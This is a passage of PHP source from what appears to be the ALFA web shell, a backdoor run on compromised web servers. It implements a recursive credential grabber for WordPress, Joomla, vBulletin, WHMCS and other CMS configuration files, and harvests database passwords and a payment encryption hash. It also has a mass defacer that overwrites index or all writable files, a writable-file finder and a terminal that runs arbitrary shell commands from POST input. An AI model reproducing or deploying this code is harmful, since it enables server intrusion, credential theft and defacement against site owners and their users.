5851 echo "<tr><th><a base_id='".$base_id."' class='archive-file-row' onclick=\"editor('".$file["path"]."','auto','','','','file');\">".$icon."<span class='archive-name archive-type-file' fname='".$file["name"]."'>".$file["name"]."</span></a><td>".alfaSize($file["size"])."</td><td>".$file["modify"]."</td><td>-</td></tr>";
5852
5853 }
5854 }
5855 echo '</table>';
5856 }catch(Exception $e){
5857 echo("0");
5858 }
5859}
5860function alfaopen_archive_dir(){
5861 $dir = $_POST["alfa1"];
5862 $base_id = $_POST["alfa2"];
5863 __alfa_open_archive_file($dir, $base_id);
5864}
5865function alfaconfig_grabber(){
5866 alfahead();
5867 echo '<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>';
5868 echo '<form name="srch" onSubmit="g(\'config_grabber\',null,null,this.dir.value,this.ext.value,null,\'>>\');return false;" method=\'post\'>
5869 <div class="txtfont">
5870 Dir: <input size="50" id="target" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
5871 Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5872 <input type="submit" name="btn" value=" "></div></form></center><br>';
5873 $dir = $_POST['alfa2'];
5874 $ext = $_POST['alfa3'];
5875 if($_POST['alfa5']=='>>'){
5876 echo __pre();
5877 Alfa_ConfigGrabber($dir, $ext);
5878 }
5879 echo '</div>';
5880 alfafooter();
5881}
5882function Alfa_ConfigGrabber($dir, $ext) {
5883 $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
5884 $db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");
5885 if(@is_readable($dir)){
5886 $globFiles = @glob("$dir/*.$ext");
5887 $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
5888 $blacklist = array();
5889 foreach ($globDirs as $dir) {
5890 if(!@is_readable($dir)||@is_link($dir)) continue;
5891 @Alfa_ConfigGrabber($dir, $ext);
5892 }
5893 foreach ($globFiles as $file){
5894 $filee = @file_get_contents($file);
5895 if(preg_match($pattern, $filee)){
5896 echo "<div><span>$file</span> <a style='cursor:pointer;' onclick=\"editor('".$file."','auto','','','','file');\">[ View file ]</a></div>";
5897 }
5898 }
5899 }
5900}
5901function alfasearcher(){
5902alfahead();
5903echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
5904if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
5905echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
5906<div class="txtfont">
5907Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
5908Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
5909Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5910<input type="submit" name="btn" value=" "></div></form></center><br>';
5911$dir = $_POST['alfa2'];
5912$ext = $_POST['alfa3'];
5913$method = $_POST['alfa4'];
5914if($_POST['alfa5']=='>>'){
5915echo __pre();
5916if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
5917Alfa_Searcher($dir,trim($ext),$method);
5918}
5919}
5920if($_POST['alfa1']=='str'){
5921echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
5922<div class="txtfont">
5923Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
5924String: <input type="text" name="string" value="">
5925Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
5926Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5927<input type="submit" name="btn" value=" "></div></form></center><br>';
5928$dir = $_POST['alfa2'];
5929$string = $_POST['alfa3'];
5930$ext = $_POST['alfa5'];
5931if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
5932echo __pre();
5933Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
5934}
5935}
5936echo '</div>';
5937alfafooter();
5938}
5939function alfaMassDefacer(){
5940alfahead();
5941AlfaNum(5,6,7,8,9,10);
5942echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
5943echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
5944 Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
5945 DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
5946</form>';
5947$dir = $_POST['alfa1'];
5948$defpage = $_POST['alfa2'];
5949$method = $_POST['alfa3'];
5950$fCurrent = $GLOBALS['__file_path'];
5951if($_POST['alfa4'] == '>>'){
5952if(!empty($dir)){
5953if(@is_dir($dir)){
5954if(@is_readable($dir)){
5955if(@is_file($defpage)){
5956if($dh = @opendir($dir)){
5957echo __pre();
5958while (($file = @readdir($dh)) !== false){
5959if($file == '..' || $file == '.')continue;
5960$newfile=$dir.$file;
5961if($fCurrent == $newfile)continue;
5962if(@is_dir($newfile)){
5963Alfa_ReadDir($newfile,$method,$defpage);
5964}else{
5965if(!@is_writable($newfile))continue;
5966if(!@is_readable($newfile))continue;
5967Alfa_Rewriter($newfile,$file,$defpage,$method);
5968}
5969}
5970closedir($dh);
5971}else{__alert('<font color="red">Error In OpenDir...</font>');}
5972}else{__alert('<font color="red">DefPage File NotFound...</font>');}
5973}else{__alert('<font color="red">Directory is not Readable...</font>');}
5974}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
5975}else{__alert('<font color="red">Dir is Empty...</font>');}
5976}
5977echo '</div>';
5978alfafooter();
5979}
5980function Alfa_ReadDir($dir,$method='',$defpage=''){
5981if(!@is_readable($dir)) return false;
5982if (@is_dir($dir)) {
5983if ($dh = @opendir($dir)) {
5984while(($file=readdir($dh))!==false) {
5985if($file == '..' || $file == '.')continue;
5986$newfile=$dir.'/'.$file;
5987if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
5988if(@is_file($newfile)){
5989if(!@is_readable($newfile))continue;
5990Alfa_Rewriter($newfile,$file,$defpage,$method);
5991}
5992}
5993closedir($dh);
5994}
5995}
5996}
5997function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
5998if(!@is_writable($dir)) return false;
5999if(!@is_readable($dir)) return false;
6000$defpage=@file_get_contents($defpage);
6001if($m == 'index'){
6002$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
6003if(in_array(strtolower($file),$indexs)){
6004@file_put_contents($dir,$defpage);
6005echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
6006}
6007}elseif($m=='all'){
6008@file_put_contents($dir,$defpage);
6009echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
6010}
6011}
6012function alfaGetDisFunc(){
6013alfahead();
6014echo '<div class="header">';
6015$disfun = @ini_get('disable_functions');
6016$s = explode(',',$disfun);
6017$f = array_unique($s);
6018echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
6019$i=1;
6020foreach($f as $s){
6021$s=trim($s);
6022if(function_exists($s)||!is_callable($s))continue;
6023echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
6024echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
6025$i++;
6026}
6027echo '</table></center>';
6028echo '</div>';
6029alfafooter();
6030}
6031function Alfa_Create_A_Tag($action,$vals){
6032$nulls = array();
6033foreach($vals as $key => $val){
6034echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
6035for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
6036$f = implode(',',$nulls);
6037echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
6038unset($nulls);
6039}
6040}
6041function Alfa_Searcher($dir, $ext, $method) {
6042if(@is_readable($dir)){
6043if($method == 'all')$ext = '*';
6044if($method == 'dirs')$ext = '*';
6045$globFiles = @glob("$dir/*.$ext");
6046$globDirs = @glob("$dir/*", GLOB_ONLYDIR);
6047$blacklist = array();
6048foreach ($globDirs as $dir) {
6049if(!@is_readable($dir)||@is_link($dir)) continue;
6050@Alfa_Searcher($dir, $ext, $method);
6051}
6052switch($method){
6053case "files":
6054foreach ($globFiles as $file){
6055if(@is_writable($file)){
6056echo "$file<br>";
6057}
6058}
6059break;
6060case "dirs":
6061foreach ($globFiles as $file){
6062if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
6063echo dirname($file).'<br>';
6064$blacklist[] = dirname($file);
6065}
6066}
6067break;
6068case "all":
6069foreach ($globFiles as $file){
6070echo $file.'<br>';
6071}
6072break;
6073}
6074unset($blacklist);
6075}
6076}
6077function AlfaiFrameCreator($f,$width='100%',$height='600px'){
6078return('<iframe src="'.__ALFA_DATA_FOLDER__."/".$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
6079}
6080class AlfaCURL {
6081public $headers;
6082public $user_agent;
6083public $compression;
6084public $cookie_file;
6085public $proxy;
6086public $path;
6087public $ssl = true;
6088public $curl_status = true;
6089function __construct($cookies=false,$compression='gzip',$proxy=''){
6090if(!extension_loaded('curl')){$curl_status = false;return false;}
6091$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
6092$this->headers[] = 'Connection: Keep-Alive';
6093$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
6094$this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';
6095$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
6096$this->compression=$compression;
6097$this->proxy=$proxy;
6098$this->cookies=$cookies;
6099if($this->cookies)$this->cookie($this->path);
6100}
6101function cookie($cookie_file) {
6102if (_alfa_file_exists($cookie_file,false)) {
6103$this->cookie_file=$cookie_file;
6104}else{
6105@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
6106$this->cookie_file=$cookie_file;
6107@fclose($this->cookie_file);
6108}
6109}
6110function Send($url,$method="get",$data=""){
6111if(!$this->curl_status){return false;}
6112$process = curl_init($url);
6113curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
6114curl_setopt($process, CURLOPT_HEADER, 0);
6115curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
6116curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
6117curl_setopt($process, CURLOPT_ENCODING , $this->compression);
6118curl_setopt($process, CURLOPT_TIMEOUT, 30);
6119if($this->ssl){
6120curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
6121curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
6122}
6123if($this->cookies){
6124curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
6125curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
6126}
6127if($this->proxy){
6128curl_setopt($process, CURLOPT_PROXY, $this->proxy);
6129}
6130if($method=='post'){
6131curl_setopt($process, CURLOPT_POSTFIELDS, $data);
6132curl_setopt($process, CURLOPT_POST, 1);
6133curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
6134}
6135$return = @curl_exec($process);
6136curl_close($process);
6137return $return;
6138}
6139function error($error) {
6140echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
6141die;
6142}
6143}
6144function getConfigHtml($cms){
6145$content = '';
6146$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
6147$content .= "<form class='getconfig' onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value,this.getAttribute(\"base_id\"));return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
6148foreach($cms_array as $key => $val){
6149$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
6150}
6151$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
6152$content .= "</form>";
6153return $content;
6154}
6155if (!function_exists('json_encode')){
6156 function json_encode($a=false){
6157 if (is_null($a)) return 'null';
6158 if ($a === false) return 'false';
6159 if ($a === true) return 'true';
6160 if (is_scalar($a))
6161 {
6162 if (is_float($a))
6163 {
6164 return floatval(str_replace(",", ".", strval($a)));
6165 }
6166
6167 if (is_string($a))
6168 {
6169 static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\"'));
6170 return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
6171 }
6172 else
6173 return $a;
6174 }
6175 $isList = true;
6176 for ($i = 0, reset($a); $i < count($a); $i++, next($a))
6177 {
6178 if (key($a) !== $i)
6179 {
6180 $isList = false;
6181 break;
6182 }
6183 }
6184 $result = array();
6185 if ($isList)
6186 {
6187 foreach ($a as $v) $result[] = json_encode($v);
6188 return '[' . join(',', $result) . ']';
6189 }
6190 else
6191 {
6192 foreach ($a as $k => $v) $result[] = json_encode($k).':'.json_encode($v);
6193 return '{' . join(',', $result) . '}';
6194 }
6195 }
6196}
6197if ( !function_exists('json_decode') ){
6198function json_decode($json, $array=true){
6199 $comment = false;
6200 $out = '$x=';
6201 for ($i=0; $i<strlen($json); $i++)
6202 {
6203 if (!$comment)
6204 {
6205 if ($json[$i] == '{' || $json[$i] == '['){$out .= ' array(';}
6206 else if ($json[$i] == '}' || $json[$i] == ']'){$out .= ')';}
6207 else if ($json[$i] == ':'){$out .= '=>';}
6208 else {$out .= $json[$i];}
6209 }
6210 else $out .= $json[$i];
6211 if ($json[$i] == '"') $comment = !$comment;
6212 }
6213 eval($out . ';');
6214 return $x;
6215}
6216}
6217function alfaterminalExec(){
6218 $pwd = "pwd";
6219 $seperator = ";";
6220 if($GLOBALS['sys']!='unix'){
6221 $pwd = "cd";
6222 $seperator = "&";
6223 }
6224 if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."'".$seperator;}
6225 $current_path = '';
6226 if(preg_match("/cd[ ]{0,}(.*)[ ]{0,}".$seperator."|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST['alfa1'], $match)){
6227 if(empty($match[1])){
6228 $match[1] = $match[2];
6229 }
6230 $current_path = alfaEx("cd ".addslashes($match[1]).$seperator.$pwd);
6231 $current_path = str_replace("\\", "/", $current_path);
6232 }
6233 $out = alfaEx($cmd.$_POST['alfa1'], true);
6234 $out = htmlspecialchars($out);
6235 echo json_encode(array("output" => convertBash($out), "path" => $current_path));
6236}
6237function convertBash($code) {
6238 $dictionary = array(
6239 '[01;30m' => '<span style="color:black">',
6240 '[01;31m' => '<span style="color:red">',
6241 '[01;32m' => '<span style="color:green">',
6242 '[01;33m' => '<span style="color:yellow">',
6243 '[01;34m' => '<span style="color:blue">',
6244 '[01;35m' => '<span style="color:purple">',
6245 '[01;36m' => '<span style="color:cyan">',
6246 '[01;37m' => '<span style="color:white">',
6247 '[0m' => '</span>'
6248 );
6249 $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);
6250 return $htmlString;
6251}
6252function alfadoActions(){
6253 $chdir_fals = false;
6254 if(!@chdir($_POST['c'])){
6255 $chdir_fals = true;
6256 $alfa_canruncmd = _alfa_can_runCommand(true,true);
6257 }
6258 if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
6259 if(isset($_POST['alfa2']))$_POST['alfa2'] = rawurldecode($_POST['alfa2']);
6260 $action = $_POST["alfa3"];
6261 if($action == "permission"){
6262 $perms = 0;
6263 $perm = $_POST["alfa2"];
6264 for($i=strlen($perm)-1;$i>=0;--$i){
6265 $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
6266 }
6267 if(@chmod($_POST['alfa1'], $perms)){
6268 echo("done");
6269 }else{
6270 echo("no");
6271 }
6272 return;
6273 }
6274 if($action == "rename" || $action == "move"){
6275 $alfa1_decoded = $_POST['alfa1'];
6276 if($chdir_fals){
6277 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
6278 }
6279 $_POST['alfa1'] = trim($_POST['alfa1']);
6280 $alfa1_escape = addslashes($_POST["alfa1"]);
6281 if($_POST["alfa3"] == "rename"){
6282 $_POST['alfa2'] = basename($_POST['alfa2']);
6283 }
6284 if(!empty($_POST['alfa2'])){
6285 $cmd_rename = false;
6286 if($chdir_fals&&$alfa_canruncmd){
6287 if(_alfa_is_writable($_POST['alfa1'])){
6288 $cmd_rename = true;
6289 $alfa1_escape = addslashes($alfa1_decoded);
6290 alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa2'])."'");
6291 }
6292 }
6293 if(!file_exists($_POST['alfa2'])){
6294 if(@rename($_POST['alfa1'], $_POST['alfa2'])||$cmd_rename){
6295 echo "done";
6296 }else{
6297 echo "no";
6298 }
6299 }else{
6300 echo "no";
6301 }
6302 }
6303 }elseif($action == "copy"){
6304 if(is_dir($_POST["alfa1"])){
6305 $dir = str_replace('//', '/', $_POST["alfa1"]);
6306 $dir = explode('/', $dir);
6307 if(empty($dir[count($dir) - 1])){
6308 $name = $dir[count($dir) - 2];
6309 }else{
6310 $name = $dir[count($dir) - 1];
6311 }
6312 }else{
6313 $name = basename($_POST["alfa1"]);
6314 }
6315 $dir = dirname($_POST["alfa1"]);
6316 if($dir == "."){
6317 $dir = $_POST["c"]."/";
6318 }
6319 if(is_file($_POST["alfa1"])){
6320 @copy($_POST["alfa1"], $_POST["alfa2"]);
6321 echo("done");
6322 }elseif(is_dir($_POST["alfa1"])){
6323 if(!is_dir($_POST["alfa2"])){
6324 mkdir($_POST["alfa2"], 0755, true);
6325 }
6326 copy_paste($dir, $name , $_POST["alfa2"] . "/");
6327 echo("done");
6328 }
6329 }elseif($action == "modify"){
6330 if( !empty($_POST['alfa1']) ) {
6331 $time = strtotime($_POST['alfa1']);
6332 if($time){
6333 $touched = false;
6334 if($chdir_fals&&$alfa_canruncmd){
6335 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa1']))."' '".addslashes($_POST['alfa2'])."'");
6336 $touched = true;
6337 }
6338 if(!@touch($_POST['alfa2'],$time,$time)&&!$touched){
6339 echo 'no';
6340 }else{
6341 echo 'ok';
6342 }
6343 } else{
6344 echo 'badtime';
6345 }
6346 }
6347 }
6348
6349}
6350function alfaget_flags(){
6351 $flags = array();
6352 if(function_exists("curl_version")){
6353 $curl = new AlfaCURL();
6354 $server_addr = (!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]);
6355 $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);
6356 $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);
6357 if(strpos($flag2, "geoplugin") != false){
6358 $flag = json_decode($flag, true);
6359 $flag2 = json_decode($flag2, true);
6360 if(!empty($flag['geoplugin_countryCode'])){
6361 $flags["server"]["name"] = $flag['geoplugin_countryName'];
6362 $flags["server"]["code"] = $flag['geoplugin_countryCode'];
6363 }
6364 if(!empty($flag2['geoplugin_countryCode'])){
6365 $flags["client"]["name"] = $flag2['geoplugin_countryName'];
6366 $flags["client"]["code"] = $flag2['geoplugin_countryCode'];
6367 }
6368 }
6369 }
6370 echo json_encode($flags);
6371}
6372function alfaGetConfig(){
6373$cms = $_POST['alfa1'];
6374$path = trim($_POST['alfa2']);
6375$config = array(
6376'wp'=>array('file'=>'/wp-config.php',
6377'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6378'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6379'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6380'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6381'prefix'=>array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/",1)
6382),
6383'drupal'=>array('file'=>'/config.php',
6384'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6385'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6386'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6387'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
6388'prefix'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1)
6389),
6390'drupal2'=>array('file'=>'/sites/default/settings.php',
6391'host'=>array("/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
6392'dbname'=>array("/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
6393'dbuser'=>array("/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
6394'dbpw'=>array("/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
6395'prefix'=>array("/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1)
6396),
6397'vb'=>array('file'=>'/includes/config.php',
6398'host'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")servername(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
6399'dbuser'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")username(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
6400'dbname'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")dbname(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
6401'dbpw'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
6402'prefix'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")tableprefix(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3)
6403),
6404'phpnuke'=>array('file'=>'/config.php',
6405'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6406'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6407'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6408'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6409'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
6410),
6411'smf'=>array('file'=>'/Settings.php',
6412'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6413'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6414'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6415'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6416'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6417),
6418'whmcs'=>array('file'=>'/configuration.php',
6419'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6420'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6421'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6422'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6423'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6424),
6425'joomla'=>array('file'=>'/configuration.php',
6426'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6427'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6428'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6429'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6430'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6431),
6432'phpbb'=>array('file'=>'/config.php',
6433'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6434'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6435'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6436'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6437'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6438),
6439'mybb'=>array('file'=>'/inc/config.php',
6440'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6441'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6442'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6443'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6444'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6445)
6446);
6447if($cms == "drupal"){
6448 $file = $config[$cms]['file'];
6449 $file=$path.$file;
6450 if(@is_file($file)||_alfa_is_dir($file,"-e")){
6451 }else{
6452 $cms = 'drupal2';
6453 }
6454}
6455if($cms == "vb"){
6456 $file = $config[$cms]['file'];
6457 $file=$path.$file;
6458 if(@is_file($file)||_alfa_is_dir($file,"-e")){
6459 }else{
6460 $path .= '/core';
6461 }
